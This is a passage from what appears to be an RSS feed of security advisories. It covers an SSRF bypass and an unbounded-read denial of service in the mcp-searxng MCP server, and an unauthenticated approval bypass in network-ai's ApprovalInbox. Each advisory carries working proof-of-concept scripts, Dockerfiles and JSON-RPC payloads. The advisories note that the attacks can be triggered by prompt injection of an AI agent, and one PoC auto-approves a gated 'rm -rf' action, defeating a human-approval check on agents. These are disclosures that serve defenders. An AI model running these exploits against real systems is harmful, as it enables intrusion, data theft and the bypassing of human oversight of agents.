en-US Sat, 20 Jun 2026 18:00:50 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-56307 Sat, 20 Jun 2026 18:00:47 +0000 https://nvd.nist.gov/vuln/detail/CVE-2024-58351 Sat, 20 Jun 2026 18:00:50 +0000 https://github.com/advisories/GHSA-x975-rgx4-5fh4 Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-mrvx-jmjw-vggc isPrivateIpv4(address) || isPrivateIPv6(address))) { + throw createURLSecurityPolicyError(url.toString()); + } + } } @@ - assertUrlAllowed(parsedUrl); + await assertUrlAllowed(parsedUrl); @@ - assertUrlAllowed(nextUrl); + await assertUrlAllowed(nextUrl); ``` ### PoC **Prerequisites:** - Docker installed on the test machine. - The `mcp-searxng` repository cloned locally (version 1.6.0 / commit `90423e5`). **Build the container:** ```bash docker build -t mcp-searxng-ssrf-001 -f vuln-001/Dockerfile . ``` **Run the PoC:** ```bash docker run --rm \ --add-host ssrf-target.internal:127.0.0.1 \ -v $(pwd)/vuln-001/poc.py:/poc.py \ mcp-searxng-ssrf-001 \ python3 /poc.py ``` The `--add-host` flag maps `ssrf-target.internal` to `127.0.0.1` inside the container, simulating a DNS-resolved private hostname (equivalent to using a wildcard DNS service like `127.0.0.1.nip.io` in a real attack). **What the PoC does:** 1. Starts a Python HTTP server on `127.0.0.1:9796` returning the sentinel value `INTERNAL-SECRET-OK-SSRF-PROOF`. 2. Starts the MCP server in STDIO mode. 3. **Test 1:** Sends a `tools/call` request for `http://127.0.0.1:9796/` — this is correctly **blocked** by `assertUrlAllowed()`. 4. **Test 2:** Sends a `tools/call` request for `http://ssrf-target.internal:9796/` — this **bypasses** the check because the hostname is syntactically public, but resolves to `127.0.0.1` at fetch time. **Expected output (confirming SSRF):** ``` [+] BLOCKED — assertUrlAllowed() correctly rejected 127.0.0.1 [!!!] SSRF BYPASS CONFIRMED [!!!] Sentinel 'INTERNAL-SECRET-OK-SSRF-PROOF' found in MCP tool response Raw tool response text: 'INTERNAL-SECRET-OK-SSRF-PROOF' URL: http://ssrf-target.internal:9796/ (resolves to 127.0.0.1 via /etc/hosts) assertUrlAllowed() sees hostname='ssrf-target.internal' → passes string check undiciFetch() resolves DNS → 127.0.0.1 → reads internal service [RESULT] PASS ``` The same bypass can be achieved in production using any public DNS wildcard service that resolves to a private IP (e.g., `http://127.0.0.1.nip.io:PORT/`), or by controlling a custom DNS record. **MCP JSON-RPC request (STDIO mode):** ```json {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"web_url_read","arguments":{"url":"http://ssrf-target.internal:9796/","maxLength":200}}} ``` ### Impact This is a Server-Side Request Forgery (SSRF) vulnerability. An attacker who can send requests to the MCP server — or who can influence an AI agent connected to the server to call `web_url_read` with an attacker-controlled URL — can: - **Read internal HTTP services** reachable from the MCP server host (e.g., cloud metadata endpoints at `169.254.169.254`, internal APIs, admin dashboards, databases with HTTP interfaces). - **Exfiltrate sensitive data** such as cloud provider credentials, internal service tokens, or configuration secrets. - **Enumerate internal network topology** by probing responses from different internal hosts and ports. In the default HTTP deployment configuration (`MCP_HTTP_HARDEN` unset), authentication is disabled (`requireAuth: false`), so any unauthenticated network client can exploit this vulnerability. In STDIO mode, exploitation requires the AI agent connected to the MCP server to be tricked into providing an attacker-controlled URL, which is feasible via prompt injection or malicious content fetched from the web. The vulnerability has a CVSS v3.1 score of **7.1 (High)** and affects all users running `mcp-searxng` version 1.6.0 without setting `MCP_HTTP_ALLOW_PRIVATE_URLS=false` explicitly overriding to true (the insecure opt-in) or applying a patched version. ### Reproduction artifacts #### `Dockerfile` ```dockerfile FROM node:20-slim # Install Python3 for the PoC script RUN apt-get update && apt-get install -y --no-install-recommends python3 && rm -rf /var/lib/apt/lists/* WORKDIR /app # Copy the entire repository COPY . /app/ # Install dependencies and compile TypeScript RUN npm ci && npm run build # Verify the build output exists RUN test -f dist/index.js || (echo "ERROR: dist/index.js not found after build" && exit 1) # Default: drop into a shell for manual inspection; overridden by docker run CMD ["node", "dist/index.js"] ``` #### `poc.py` ```python #!/usr/bin/env python3 """ PoC for VULN-001: DNS-resolved Private Hostname SSRF in web_url_read CWE-918 | CVSS 7.1 The assertUrlAllowed() function (src/url-reader.ts:85-93) checks only the url.hostname string against private IP/hostname patterns without performing DNS resolution. A hostname that is syntactically public but resolves to a private or loopback address at fetch time bypasses the check. Attack flow: 1. Attacker provides URL with a hostname that passes the string check. 2. assertUrlAllowed(parsedUrl) at line 313 passes (no DNS resolution). 3. undiciFetch() at line 367 resolves the hostname via OS DNS, gets 127.0.0.1, and connects to the internal service. Requirements: - Container must be started with --add-host ssrf-target.internal:127.0.0.1 so that the bypass hostname resolves to the loopback address via /etc/hosts. - Node.js MCP server binary at /app/dist/index.js Usage: python3 poc.py Exit 0 = PASS (bypass confirmed), non-zero = FAIL """ import http.server import json import os import queue import subprocess import sys import threading import time # ── constants ──────────────────────────────────────────────────────────────── SENTINEL = "INTERNAL-SECRET-OK-SSRF-PROOF" INTERNAL_PORT = 9796 BYPASS_HOST = "ssrf-target.internal" # /etc/hosts: 127.0.0.1 (via --add-host) MCP_BINARY = "/app/dist/cli.js" TIMEOUT_SEC = 20 # ── internal HTTP server ───────────────────────────────────────────────────── class SentinelHandler(http.server.BaseHTTPRequestHandler): """Simulates an internal service that the SSRF attack reads.""" def _send_sentinel(self, with_body=True): body = (SENTINEL + "\n").encode() self.send_response(200) self.send_header("Content-Type", "text/plain") self.send_header("Content-Length", str(len(body))) self.end_headers() if with_body: self.wfile.write(body) def do_GET(self): self._send_sentinel(with_body=True) def do_HEAD(self): self._send_sentinel(with_body=False) def log_message(self, fmt, *args): # silence access log pass def start_internal_server(): server = http.server.HTTPServer(("127.0.0.1", INTERNAL_PORT), SentinelHandler) threading.Thread(target=server.serve_forever, daemon=True).start() print(f"[+] Internal HTTP server listening on 127.0.0.1:{INTERNAL_PORT}" f' -> sentinel: "{SENTINEL}"') return server # ── MCP communication helpers ───────────────────────────────────────────────── def start_mcp_server(): """Spawn the MCP server in STDIO mode.""" env = os.environ.copy() env.update({ "NODE_ENV": "production", # SEARXNG_URL is intentionally unset; web_url_read does not need it. }) proc = subprocess.Popen( ["node", MCP_BINARY], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, ) return proc def drain_stderr(proc): """Drain stderr in a background thread to prevent blocking.""" def _reader(): for _ in proc.stderr: pass threading.Thread(target=_reader, daemon=True).start() def attach_stdout_reader(proc): """Return a queue that receives decoded JSON-RPC messages from stdout.""" q = queue.Queue() def _reader(): for raw in proc.stdout: line = raw.strip() if not line: continue try: q.put(json.loads(line.decode())) except json.JSONDecodeError: pass # skip non-JSON output threading.Thread(target=_reader, daemon=True).start() return q def send_rpc(proc, method, params=None, rpc_id=None): """Write one JSON-RPC 2.0 message to the MCP server's stdin.""" msg = {"jsonrpc": "2.0", "method": method} if rpc_id is not None: msg["id"] = rpc_id if params is not None: msg["params"] = params proc.stdin.write((json.dumps(msg) + "\n").encode()) proc.stdin.flush() def expect_response(q, target_id, timeout=TIMEOUT_SEC): """Wait for a JSON-RPC response matching target_id.""" deadline = time.time() + timeout while time.time() < deadline: try: msg = q.get(timeout=1.0) if msg.get("id") == target_id: return msg except queue.Empty: continue return None def initialize_mcp(proc, q): """Perform the MCP initialize / initialized handshake.""" send_rpc(proc, "initialize", { "protocolVersion": "2024-11-05", "capabilities": {}, "clientInfo": {"name": "ssrf-poc", "version": "1.0"}, }, rpc_id=1) resp = expect_response(q, target_id=1) if resp is None or "result" not in resp: raise RuntimeError(f"MCP initialize timed out or failed: {resp}") proto = resp["result"].get("protocolVersion", "?") print(f"[+] MCP handshake complete (protocol={proto})") # Acknowledge initialization send_rpc(proc, "notifications/initialized") time.sleep(0.15) def call_url_read(proc, q, url, rpc_id): """Invoke the web_url_read tool and return the raw JSON-RPC response.""" send_rpc(proc, "tools/call", { "name": "web_url_read", "arguments": {"url": url, "maxLength": 600}, }, rpc_id=rpc_id) return expect_response(q, target_id=rpc_id) # ── result helpers ──────────────────────────────────────────────────────────── def extract_text(resp): """Return the text content from a tools/call result, or None.""" if resp is None: return None if "error" in resp: return None try: return resp["result"]["content"][0]["text"] except (KeyError, IndexError, TypeError): return None def is_blocked(resp): """Return True when the response indicates a security-policy block.""" if resp is None: return False # MCP SDK may surface tool errors as JSON-RPC errors OR as isError results if "error" in resp: return True text = extract_text(resp) or "" if resp.get("result", {}).get("isError"): return True if "URLSecurityPolicy" in text or "not allowed" in text.lower(): return True return False # ── main ────────────────────────────────────────────────────────────────────── def main(): print("=" * 62) print("VULN-001 DNS-resolved Private Hostname SSRF in web_url_read") print("=" * 62) # 1. Verify /etc/hosts entry is present bypass_url = f"http://{BYPASS_HOST}:{INTERNAL_PORT}/" with open("/etc/hosts") as f: hosts_content = f.read() if BYPASS_HOST not in hosts_content: print(f"[-] FATAL: '{BYPASS_HOST}' not in /etc/hosts.") print(" Re-run with: --add-host ssrf-target.internal:127.0.0.1") sys.exit(3) print(f"[+] /etc/hosts contains entry for {BYPASS_HOST}") # 2. Start internal HTTP service start_internal_server() time.sleep(0.2) # 3. Start MCP server print(f"[*] Spawning MCP server: node {MCP_BINARY}") proc = start_mcp_server() drain_stderr(proc) msg_queue = attach_stdout_reader(proc) time.sleep(1.2) # allow server startup if proc.poll() is not None: print(f"[-] MCP server exited early (rc={proc.returncode})") sys.exit(4) print(f"[+] MCP server running (PID={proc.pid})") try: # 4. MCP handshake print("[*] MCP initialize ...") initialize_mcp(proc, msg_queue) # ── Test 1: direct private IP should be BLOCKED ─────────────────── blocked_target = f"http://127.0.0.1:{INTERNAL_PORT}/" print(f"\n[*] Test 1 — direct private IP (EXPECT: BLOCKED)") print(f" URL: {blocked_target}") resp1 = call_url_read(proc, msg_queue, blocked_target, rpc_id=2) text1 = extract_text(resp1) or "" if is_blocked(resp1): print(f"[+] BLOCKED — assertUrlAllowed() correctly rejected 127.0.0.1") else: print(f"[!] WARNING — direct 127.0.0.1 was NOT blocked (text={text1[:120]})") # ── Test 2: hostname bypass SHOULD succeed ───────────────────────── print(f"\n[*] Test 2 — hostname bypass (EXPECT: PASS / SSRF)") print(f" URL: {bypass_url}") print(f" assertUrlAllowed() sees hostname='{BYPASS_HOST}' → passes string check") print(f" undiciFetch() resolves DNS → 127.0.0.1 → reads internal service") resp2 = call_url_read(proc, msg_queue, bypass_url, rpc_id=3) text2 = extract_text(resp2) or "" print(f"\n Raw tool response text (first 400 chars):") print(f" {repr(text2[:400])}") if SENTINEL in text2: print(f"\n[!!!] SSRF BYPASS CONFIRMED") print(f"[!!!] Sentinel '{SENTINEL}' found in MCP tool response") print(f"\n[RESULT] PASS") sys.exit(0) elif is_blocked(resp2): print(f"\n[-] Bypass request was also BLOCKED (unexpected).") print(f" resp2={json.dumps(resp2)[:300]}") print(f"\n[RESULT] FAIL — bypass was blocked") sys.exit(1) else: print(f"\n[-] Response received but sentinel not found.") print(f" resp2={json.dumps(resp2)[:400]}") print(f"\n[RESULT] FAIL — unexpected response") sys.exit(1) finally: proc.terminate() if __name__ == "__main__": main() ```]]> Sat, 20 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-xcqx-9jf5-w339 maxContentLengthBytes) { return createContentTooLargeMessage(contentLength, maxContentLengthBytes); } ``` `checkContentLength()` (`src/url-reader.ts:243-245`) returns `null` when the HEAD response carries no `Content-Length` header. Because the guard uses the `!== null` conjunction, a `null` result causes the entire check to evaluate as `false`, and execution falls through without enforcing the configured 5 MiB ceiling. **Unbounded sinks** A full GET request is then issued (`src/url-reader.ts:367`) with no streaming byte cap: ```ts // src/url-reader.ts:414 — normal response path htmlContent = await response.text(); // src/url-reader.ts:402 — error response path (same issue) responseBody = await response.text(); ``` The full HTML string is subsequently passed to `NodeHtmlMarkdown.translate()` (`src/url-reader.ts:429`), which amplifies CPU consumption proportional to the body size. **Default exposure** `web_url_read` is enabled by default. In HTTP transport mode, authentication is disabled by default, so `AV:N/PR:N` applies unconditionally. In stdio mode, an attacker can trigger the path via prompt injection to cause the AI model to call the tool with an attacker-controlled URL. ### PoC **Prerequisites** - Docker installed. - Build context: the repository root (`npmAI_249_ihor-sokoliuk__mcp-searxng/`). **Build the image** ```bash docker build \ -t vuln002-test \ -f vuln-002/Dockerfile \ reports/npmAI_249_ihor-sokoliuk__mcp-searxng/ ``` **Run the PoC** ```bash docker run --rm vuln002-test ``` The container starts two processes: 1. A malicious HTTP server on `127.0.0.1:9799` that responds to HEAD with HTTP 200 and **no `Content-Length`**, then responds to GET with a 6,291,456-byte HTML body and **no `Content-Length`**. 2. mcp-searxng in HTTP mode (`MCP_HTTP_ALLOW_PRIVATE_URLS=true` enables loopback URLs for local reproduction). The PoC script initializes an MCP session and calls: ```json { "method": "tools/call", "params": { "name": "web_url_read", "arguments": { "url": "http://127.0.0.1:9799/", "maxLength": 1 } } } ``` **Observed output (Phase 2 confirmation)** ``` HEAD_REQUESTS : 1 GET_REQUESTS : 1 GET_BYTES_SENT : 6,291,456 CONFIGURED_DEFAULT_LIMIT : 5,242,880 BYTES_OVER_LIMIT : +1,048,576 ELAPSED_SEC : 0.17 TOOL_STATUS : SUCCESS RETURNED_LENGTH_CHARS : 1 [PASS] VULNERABILITY CONFIRMED 6,291,456 bytes were transmitted to mcp-searxng despite a 5,242,880-byte (5 MiB) limit. Root cause confirmed: 1. HEAD response had no Content-Length header. 2. checkContentLength() returned null (url-reader.ts:243-245) 3. Guard condition was false (null !== null => false) (url-reader.ts:359) 4. response.text() read 6,291,456 bytes without a cap (url-reader.ts:414) ``` **Remediation** Replace both `response.text()` calls with a streaming reader that aborts once the byte counter exceeds `maxContentLengthBytes`: ```diff +async function readResponseTextWithLimit(response: Response, maxBytes: number): Promise { + if (!response.body) return response.text(); + const reader = response.body.getReader(); + const decoder = new TextDecoder(); + const chunks: string[] = []; + let total = 0; + while (true) { + const { done, value } = await reader.read(); + if (done) break; + total += value.byteLength; + if (total > maxBytes) { await reader.cancel(); return null; } + chunks.push(decoder.decode(value, { stream: true })); + } + chunks.push(decoder.decode()); + return chunks.join(""); +} - responseBody = await response.text(); + responseBody = await readResponseTextWithLimit(response, maxContentLengthBytes) + ?? "[Response body exceeded configured size limit]"; - htmlContent = await response.text(); + const limitedBody = await readResponseTextWithLimit(response, maxContentLengthBytes); + if (limitedBody === null) { + return createContentTooLargeMessage(maxContentLengthBytes + 1, maxContentLengthBytes); + } + htmlContent = limitedBody; ``` ### Impact This is an **Uncontrolled Resource Consumption (DoS)** vulnerability. Any network-reachable attacker who can supply a URL to the `web_url_read` tool can force the mcp-searxng process to allocate memory proportional to an arbitrarily large HTTP response body and burn CPU during HTML-to-Markdown conversion. The attack requires no authentication in the default HTTP transport configuration. In stdio mode, the attack surface is accessible through prompt injection targeting the AI agent. Repeated or concurrent invocations can exhaust process memory and render the MCP server unavailable to all legitimate users. ### Reproduction artifacts #### `Dockerfile` ```dockerfile FROM node:20-slim # Install Python3 for the PoC script RUN apt-get update && apt-get install -y --no-install-recommends python3 \ && rm -rf /var/lib/apt/lists/* # Copy repository source and build the vulnerable mcp-searxng # Build context: parent directory (npmAI_249_ihor-sokoliuk__mcp-searxng/) WORKDIR /app COPY repo/ /app/ RUN npm ci && npm run build # Copy the PoC script COPY vuln-002/poc.py /poc.py # Run the dynamic reproduction PoC CMD ["python3", "-u", "/poc.py"] ``` #### `poc.py` ```python #!/usr/bin/env python3 """ PoC for VULN-002: Unbounded Response Body Read Bypasses URL Size Limit (CWE-400) Affected: ihor-sokoliuk/mcp-searxng v1.6.0 File: src/url-reader.ts:414 (response.text()) CWE: CWE-400 Uncontrolled Resource Consumption CVSS: 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Root cause: checkContentLength() at src/url-reader.ts:243-245 returns null when the server sends no Content-Length header. The guard at line 359: if (contentLength !== null && contentLength > maxContentLengthBytes) evaluates to false (null !== null => false), so the check is skipped. response.text() at line 414 then reads the full body without any byte cap. Reproduction: 1. Malicious HTTP server (this process, port 9799): HEAD => 200, Content-Type only, NO Content-Length GET => 200, 6+ MiB HTML body, NO Content-Length 2. mcp-searxng (subprocess, HTTP mode, port 3000): MCP_HTTP_ALLOW_PRIVATE_URLS=true -- allows 127.x for local PoC 3. This script initializes an MCP session, calls web_url_read pointing at the malicious server, and measures actual bytes transmitted. Expected evidence: GET_BYTES_SENT > CONFIGURED_DEFAULT_LIMIT (5242880) => The 5 MiB guard was bypassed; full body was consumed without a cap. """ import json import os import socket import subprocess import sys import threading import time import urllib.error import urllib.request from http.server import BaseHTTPRequestHandler, HTTPServer # --------------------------------------------------------------------------- # Constants # --------------------------------------------------------------------------- DEFAULT_MAX_CONTENT_LENGTH = 5 * 1024 * 1024 # 5 MiB (same as src/url-reader.ts) BODY_SIZE_BYTES = 6 * 1024 * 1024 # 6 MiB — exceeds the configured limit EVIL_PORT = 9799 MCP_PORT = 3000 # --------------------------------------------------------------------------- # Shared state — updated by the malicious server thread # --------------------------------------------------------------------------- g_bytes_sent = 0 g_head_count = 0 g_get_count = 0 # --------------------------------------------------------------------------- # Malicious HTTP server # --------------------------------------------------------------------------- class MaliciousHandler(BaseHTTPRequestHandler): """ Simulates an attacker-controlled HTTP server that: - Returns 200 for HEAD with NO Content-Length (triggers null in checkContentLength) - Returns 200 for GET with a 6 MiB body and NO Content-Length (triggers unbounded response.text() read) """ # Use HTTP/1.0 so the connection closes after the body — no Content-Length needed. protocol_version = "HTTP/1.0" def log_message(self, fmt, *args): # suppress default per-request logging pass def do_HEAD(self): global g_head_count g_head_count += 1 print( f"[EVIL-SERVER] HEAD #{g_head_count} from {self.address_string()}" " — responding 200 with NO Content-Length (triggers null in checkContentLength)", flush=True, ) self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") # Deliberately omitting Content-Length — this is the bypass trigger self.end_headers() def do_GET(self): global g_get_count, g_bytes_sent g_get_count += 1 print( f"[EVIL-SERVER] GET #{g_get_count} from {self.address_string()}" f" — streaming {BODY_SIZE_BYTES:,} bytes with NO Content-Length", flush=True, ) self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") # Deliberately NO Content-Length header self.end_headers() # Build a simple but large HTML body that exceeds DEFAULT_MAX_CONTENT_LENGTH. # Simple structure keeps NodeHtmlMarkdown conversion fast. header = b"" footer = b"" payload_char = b"A" target = BODY_SIZE_BYTES - len(header) - len(footer) chunk_size = 65536 # 64 KiB chunks total = 0 try: self.wfile.write(header) total += len(header) while total < BODY_SIZE_BYTES - len(footer): chunk = payload_char * min(chunk_size, BODY_SIZE_BYTES - len(footer) - total) self.wfile.write(chunk) total += len(chunk) self.wfile.write(footer) total += len(footer) except (BrokenPipeError, OSError): pass # client may close early on abort g_bytes_sent = total print(f"[EVIL-SERVER] Done. Total bytes sent: {g_bytes_sent:,}", flush=True) def run_evil_server(): srv = HTTPServer(("127.0.0.1", EVIL_PORT), MaliciousHandler) srv.serve_forever() # --------------------------------------------------------------------------- # Helpers # --------------------------------------------------------------------------- def wait_for_port(host: str, port: int, timeout: float = 30) -> bool: deadline = time.monotonic() + timeout while time.monotonic() < deadline: try: with socket.create_connection((host, port), timeout=1): return True except (ConnectionRefusedError, OSError): time.sleep(0.3) return False def http_post(url: str, payload: dict, session_id: str | None = None, timeout: float = 120) -> tuple[bytes, str, str | None]: """POST a JSON-RPC payload to the MCP HTTP endpoint. Returns (body, content_type, session_id).""" headers = { "Content-Type": "application/json", "Accept": "application/json, text/event-stream", } if session_id: headers["mcp-session-id"] = session_id data = json.dumps(payload).encode() req = urllib.request.Request(url, data=data, headers=headers, method="POST") with urllib.request.urlopen(req, timeout=timeout) as resp: body = resp.read() ct = resp.headers.get("content-type", "") sid = resp.headers.get("mcp-session-id") return body, ct, sid def parse_mcp_response(body: bytes, content_type: str) -> dict | None: """Parse a JSON or SSE-wrapped JSON-RPC response.""" if "text/event-stream" in content_type: for line in body.decode(errors="replace").splitlines(): if line.startswith("data: "): try: return json.loads(line[6:]) except json.JSONDecodeError: continue return None try: return json.loads(body) except json.JSONDecodeError: # Fallback: try SSE even if content-type says JSON for line in body.decode(errors="replace").splitlines(): if line.startswith("data: "): try: return json.loads(line[6:]) except json.JSONDecodeError: continue return None # --------------------------------------------------------------------------- # Main PoC # --------------------------------------------------------------------------- def main(): print("=" * 72, flush=True) print("VULN-002 PoC — Unbounded Response Body Read Bypasses URL Size Limit", flush=True) print("=" * 72, flush=True) print(f" DEFAULT_MAX_CONTENT_LENGTH_BYTES : {DEFAULT_MAX_CONTENT_LENGTH:,}", flush=True) print(f" EVIL_BODY_SIZE_BYTES : {BODY_SIZE_BYTES:,}", flush=True) print(f" BYTES_OVER_LIMIT : +{BODY_SIZE_BYTES - DEFAULT_MAX_CONTENT_LENGTH:,}", flush=True) print(flush=True) # ------------------------------------------------------------------ # Step 1: Start the malicious HTTP server # ------------------------------------------------------------------ print(f"[*] Starting malicious HTTP server on 127.0.0.1:{EVIL_PORT} ...", flush=True) evil_thread = threading.Thread(target=run_evil_server, daemon=True) evil_thread.start() if not wait_for_port("127.0.0.1", EVIL_PORT, timeout=5): print("[ERROR] Malicious server failed to start within 5 s", flush=True) sys.exit(1) print("[+] Malicious server ready", flush=True) # ------------------------------------------------------------------ # Step 2: Start mcp-searxng in HTTP mode # ------------------------------------------------------------------ print(f"[*] Starting mcp-searxng HTTP server on 127.0.0.1:{MCP_PORT} ...", flush=True) env = { **os.environ, "MCP_HTTP_PORT" : str(MCP_PORT), "MCP_HTTP_HOST" : "127.0.0.1", "SEARXNG_URL" : "http://127.0.0.1:8080", # not used in this test # Allow 127.x URLs so the PoC can point at the local malicious server. # (Real attacks target public servers — this env var enables local reproduction.) "MCP_HTTP_ALLOW_PRIVATE_URLS": "true", "NODE_ENV" : "production", } proc = subprocess.Popen( ["node", "/app/dist/cli.js"], env=env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, ) def stream_server_logs(): for line in proc.stdout: print(f"[MCP-SERVER] {line.decode(errors='replace').rstrip()}", flush=True) log_thread = threading.Thread(target=stream_server_logs, daemon=True) log_thread.start() if not wait_for_port("127.0.0.1", MCP_PORT, timeout=20): print("[ERROR] mcp-searxng HTTP server failed to start within 20 s", flush=True) proc.terminate() sys.exit(1) print("[+] mcp-searxng HTTP server ready", flush=True) mcp_url = f"http://127.0.0.1:{MCP_PORT}/mcp" # ------------------------------------------------------------------ # Step 3: Initialize MCP session # ------------------------------------------------------------------ print("[*] Initializing MCP session ...", flush=True) init_body, init_ct, session_id = http_post( mcp_url, payload={ "jsonrpc": "2.0", "id": 1, "method": "initialize", "params": { "protocolVersion": "2024-11-05", "capabilities": {}, "clientInfo": {"name": "vuln002-poc", "version": "1.0"}, }, }, ) init_resp = parse_mcp_response(init_body, init_ct) if not init_resp or "result" not in init_resp: print(f"[ERROR] initialize failed: {init_body[:400]}", flush=True) proc.terminate() sys.exit(1) print(f"[+] Session initialized. session_id={session_id}", flush=True) # Send notifications/initialized (no response expected — ignore errors) try: http_post( mcp_url, session_id=session_id, payload={"jsonrpc": "2.0", "method": "notifications/initialized"}, timeout=10, ) except Exception: pass # 202 with empty body or similar non-error responses # ------------------------------------------------------------------ # Step 4: Call web_url_read pointing at the malicious server # ------------------------------------------------------------------ evil_url = f"http://127.0.0.1:{EVIL_PORT}/" print(flush=True) print(f"[*] Calling web_url_read with URL: {evil_url}", flush=True) print(f" HEAD response will have NO Content-Length", flush=True) print(f" => checkContentLength() returns null", flush=True) print(f" => guard at url-reader.ts:359 is bypassed", flush=True) print(f" => response.text() at url-reader.ts:414 reads ALL {BODY_SIZE_BYTES:,} bytes", flush=True) t_start = time.monotonic() try: tool_body, tool_ct, _ = http_post( mcp_url, session_id=session_id, payload={ "jsonrpc": "2.0", "id": 2, "method": "tools/call", "params": { "name": "web_url_read", "arguments": {"url": evil_url, "maxLength": 1}, }, }, timeout=120, ) elapsed = time.monotonic() - t_start tool_resp = parse_mcp_response(tool_body, tool_ct) except urllib.error.HTTPError as e: elapsed = time.monotonic() - t_start tool_resp = parse_mcp_response(e.read(), e.headers.get("content-type", "")) except Exception as e: elapsed = time.monotonic() - t_start print(f"[WARN] tool call exception: {e}", flush=True) tool_resp = None # Give the evil server thread a moment to flush its final log time.sleep(0.5) # ------------------------------------------------------------------ # Step 5: Collect and report evidence # ------------------------------------------------------------------ print(flush=True) print("=" * 72, flush=True) print("[EVIDENCE]", flush=True) print(f" HEAD_REQUESTS : {g_head_count}", flush=True) print(f" GET_REQUESTS : {g_get_count}", flush=True) print(f" GET_BYTES_SENT : {g_bytes_sent:,}", flush=True) print(f" CONFIGURED_DEFAULT_LIMIT : {DEFAULT_MAX_CONTENT_LENGTH:,}", flush=True) print( f" BYTES_OVER_LIMIT : {g_bytes_sent - DEFAULT_MAX_CONTENT_LENGTH:+,}", flush=True, ) print(f" ELAPSED_SEC : {elapsed:.2f}", flush=True) if tool_resp: if "error" in tool_resp: err = tool_resp["error"] print( f" TOOL_STATUS : ERROR code={err.get('code')} " f"msg={str(err.get('message', ''))[:120]}", flush=True, ) elif "result" in tool_resp: content = tool_resp["result"].get("content", []) text = content[0].get("text", "") if content else "" print(f" TOOL_STATUS : SUCCESS", flush=True) print(f" RETURNED_LENGTH_CHARS : {len(text)}", flush=True) print(f" RETURNED_EXCERPT : {repr(text[:80])}", flush=True) else: print(f" TOOL_STATUS : (raw) {tool_body[:200] if tool_body else b''}", flush=True) print("=" * 72, flush=True) # ------------------------------------------------------------------ # Verdict # ------------------------------------------------------------------ bypass_confirmed = g_bytes_sent > DEFAULT_MAX_CONTENT_LENGTH if bypass_confirmed: print(flush=True) print("[PASS] VULNERABILITY CONFIRMED", flush=True) print( f" {g_bytes_sent:,} bytes were transmitted to mcp-searxng despite a " f"{DEFAULT_MAX_CONTENT_LENGTH:,}-byte ({DEFAULT_MAX_CONTENT_LENGTH // (1024*1024)} MiB) limit.", flush=True, ) print(f" Root cause confirmed:", flush=True) print(f" 1. HEAD response had no Content-Length header.", flush=True) print(f" 2. checkContentLength() returned null (url-reader.ts:243-245)", flush=True) print(f" 3. Guard condition was false (null !== null => false) (url-reader.ts:359)", flush=True) print(f" 4. response.text() read {g_bytes_sent:,} bytes without a cap (url-reader.ts:414)", flush=True) proc.terminate() sys.exit(0) else: print(flush=True) if g_get_count == 0: print("[FAIL] GET request was never received — mcp-searxng did not fetch from the evil server", flush=True) else: print( f"[FAIL] GET request received but bytes_sent={g_bytes_sent:,}]]> Sat, 20 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-mxjx-28vx-xjjj action proceeds ... }); } } ``` `approve()` resolves the pending promise that `ApprovalGate` is awaiting, so the gated action proceeds: ```js // lib/approval-inbox.ts:172-183 / 327-339 approve(id, approvedBy, reason) { ... return this.resolve(id, 'approved', { approved: true, approvedBy, reason }); // promise -> {approved:true} } ``` `startServer()` binds the handler (default `127.0.0.1`, but any host the caller passes): ```js // lib/approval-inbox.ts:281-286 startServer(port, hostname = '127.0.0.1') { const server = createServer(this.httpHandler()); server.listen(port, hostname); return server; } ``` There is **no option** to supply a secret/token (unlike `McpSseServer`/`McpHttpServer`, which require one and fail closed), and the wildcard `ACAO: *` is hardcoded — an operator cannot configure their way out of it. ### Why the wildcard CORS matters The two routes needed for exploitation are reachable cross-origin: - `GET /approvals/?status=pending` is a CORS *simple request*; `ACAO: *` lets a malicious page **read** the response and learn the pending approval ids. - `POST /approvals/:id/approve` with `Content-Type: application/json` triggers a preflight, which succeeds because the server answers `OPTIONS` with `ACAO: *`, `Access-Control-Allow-Methods: …POST…`, and `Access-Control-Allow-Headers: Content-Type`. The browser then sends the approve. `approvedBy` defaults to `'anonymous'`, so no special body is required. So a website the operator merely visits while the inbox is running can enumerate and approve all pending high-risk actions. ## Proof of Concept Self-contained against the **published `network-ai@5.11.0`** package (no project files needed; re-confirmed 2026-06-17). It starts the documented `ApprovalInbox` server, has an agent submit a high-risk gated action, then acts as an **unauthenticated** client. ```bash mkdir na-poc && cd na-poc && npm init -y >/dev/null && npm i network-ai@5.11.0 node poc.mjs ``` `poc.mjs`: ```js import { ApprovalInbox } from "network-ai"; import http from "node:http"; const PORT = 7798; const req = (method, path, body) => new Promise((resolve, reject) => { // plain client — NO Authorization header const data = body ? JSON.stringify(body) : undefined; const r = http.request({ host: "127.0.0.1", port: PORT, method, path, headers: data ? { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(data) } : {} }, (res) => { let b = ""; res.on("data", c => b += c); res.on("end", () => { let j; try { j = JSON.parse(b); } catch { j = b; } resolve({ status: res.statusCode, json: j }); }); }); r.on("error", reject); if (data) r.write(data); r.end(); }); const inbox = new ApprovalInbox(); const gate = inbox.callback(); // what ApprovalGate calls before a dangerous action inbox.startServer(PORT, "127.0.0.1"); // the documented "web-accessible approval queue" await new Promise(r => setTimeout(r, 150)); let resolved = false; const decisionP = gate({ action: "shell_execute", target: "rm -rf /important/data", agentId: "worker-1", justification: "cleanup", riskLevel: "high" }).then(d => (resolved = true, d)); console.log("Gated dangerous action pending human approval. resolved =", resolved); const list = await req("GET", "/approvals/?status=pending"); // attacker enumerates pending approvals const id = list.json[0].id; const approve = await req("POST", `/approvals/${id}/approve`, { approvedBy: "attacker" }); // and approves one console.log("[attacker] GET /approvals/ (no auth) ->", list.status, "ids:", list.json.map(e => e.id)); console.log("[attacker] POST /approvals/" + id + "/approve (no auth) ->", approve.status, approve.json?.status); const decision = await decisionP; console.log(">>> gate decision delivered to agent:", JSON.stringify(decision), "| WIPED WITHOUT AUTH:", decision.approved && resolved); ``` Output: ``` Gated dangerous action pending human approval. resolved = false [attacker] GET /approvals/ (no auth) -> 